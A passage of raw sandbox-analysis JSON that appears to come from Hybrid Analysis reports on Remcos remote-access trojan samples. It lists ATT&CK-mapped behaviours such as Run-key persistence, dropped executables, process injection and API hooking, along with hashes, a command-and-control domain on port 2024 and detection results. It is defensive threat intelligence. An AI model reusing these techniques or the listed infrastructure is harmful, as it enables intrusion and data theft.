(UID: 00000000-00002984)\n \"remcos.exe\" called \"GetForegroundWindow\" (UID: 00000000-00001348)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\REMCOS.EXE\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\REMCOS.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"FindFirstFileW\" with parameter %ALLUSERSPROFILE%\\Remcos\\*.* (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"FindNextFileW\" with parameter remcos.exe (UID: 00000000-00002984)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-81", "type": 7, "relevance": 5, "name": "High entropy domain detected", "description": "Contacted domain: \"amarre2024.kozow.com\" has high entropy", "origin": "Network Traffic", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" opened \"\\Device\\KsecDD\"\n \"remcos.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2]\n Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: remcos.exe.bin]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"remcos.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2]\n Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: remcos.exe.bin]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has resource with unusual entropy \"RT_RCDATA:7.869009166471824\"\n \"remcos.exe.bin\" has resource with unusual entropy \"RT_RCDATA:7.869009166471824\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-4QDXC3\"; Value: \"\"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-4QDXC3\"; Value: \"\"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\"\")\n \"remcos.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"remcos.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-4QDXC3\"; Value: \"\"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\"\")\n \"remcos.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"remcos.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"RMC-4QDXC3\"; Value: \"\"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"remcos.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Remcos\\remcos.exe]- [targetUID: 00000000-00002984]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has section name .text with entropy \"6.6273936921798455\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has section name .reloc with entropy \"6.723768218094163\"\n \"remcos.exe.bin\" has section name .text with entropy \"6.6273936921798455\"\n \"remcos.exe.bin\" has section name .reloc with entropy \"6.723768218094163\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\" connects to <IPv4> on port 2024 (TCP); Domain: \"amarre2024.kozow.com\"", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DYNAMIC_DNS Query to a *.kozow .com Domain\" (SID: 2045993, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "16/22 Antivirus vendors marked dropped file \"remcos.exe.bin\" as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"remcos.exe\" as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "16/22 Antivirus vendors marked spawned process \"remcos.exe\" (PID: 1348) as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)\n 16/22 Antivirus vendors marked spawned process \"remcos.exe\" (PID: 5076) as malicious (classified as \"Trojan.Remcos\" with 72% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" wrote 32 bytes to a remote process \"C:\\ProgramData\\Remcos\\remcos.exe\" (Handle: 560)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" wrote 52 bytes to a remote process \"C:\\ProgramData\\Remcos\\remcos.exe\" (Handle: 560)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" wrote 4 bytes to a remote process \"C:\\ProgramData\\Remcos\\remcos.exe\" (Handle: 560)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-27", "type": 8, "relevance": 7, "name": "Drops executable files to the application program directory (%ProgramData%)", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows\" was dropped at \"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"remcos.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"remcos.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"remcos.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"remcos.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"remcos.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 2024", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa
https://hybrid-analysis.com/sample/94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa
Hybrid Analysis - Remcos
{"size": 494080, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "DEF.exe", "sha256": "94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa", "av_detect": 92, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 2, "total_processes": 5, "total_signatures": 249, "extracted_files": [{"name": "music.exe", "file_path": "%ALLUSERSPROFILE%\\db\\music.exe", "file_size": 494080, "sha256": "94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "DEF.exe (PID: 6032)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23, "file_available_to_download": true}, {"name": "music.exe.bin", "file_size": 494080, "sha256": "94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23, "file_available_to_download": true}, {"name": "dism.log", "file_size": 279678, "sha256": "86039a013535263e2158963df3a8299c7cda2bd14c9eac91d8f366bcf298fe48", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.6712F542.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "json_1_.json", "file_size": 962, "sha256": "168b4d03efa78f86ee21b1c0eb51a53f7b5f0b7cd20f2592c9299b1355978670", "type_tags": ["data"], "description": "JSON data", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00006032", "name": "DEF.exe", "normalized_path": "C:\\DEF.exe", "sha256": "94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23}, {"uid": "00000000-00006012", "parentuid": "00000000-00006032", "name": "music.exe", "normalized_path": "%ALLUSERSPROFILE%\\db\\music.exe", "sha256": "94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23}, {"uid": "00000000-00004364", "parentuid": "00000000-00006012", "name": "svchost.exe", "normalized_path": "%WINDIR%\\System32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}, {"uid": "00000000-00004492", "name": "music.exe", "normalized_path": "%ALLUSERSPROFILE%\\db\\music.exe", "sha256": "94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23}, {"uid": "00000000-00005004", "parentuid": "00000000-00004492", "name": "svchost.exe", "normalized_path": "%WINDIR%\\System32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Reconnaissance", "technique": "IP Addresses", "attck_id": "T1590.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Gather Victim Network Information", "attck_id": "T1590", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590"}}, {"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 2, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Office Application Startup", "attck_id": "T1137", "attck_id_wiki": "https://attack.mitre.org/techniques/T1137", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", 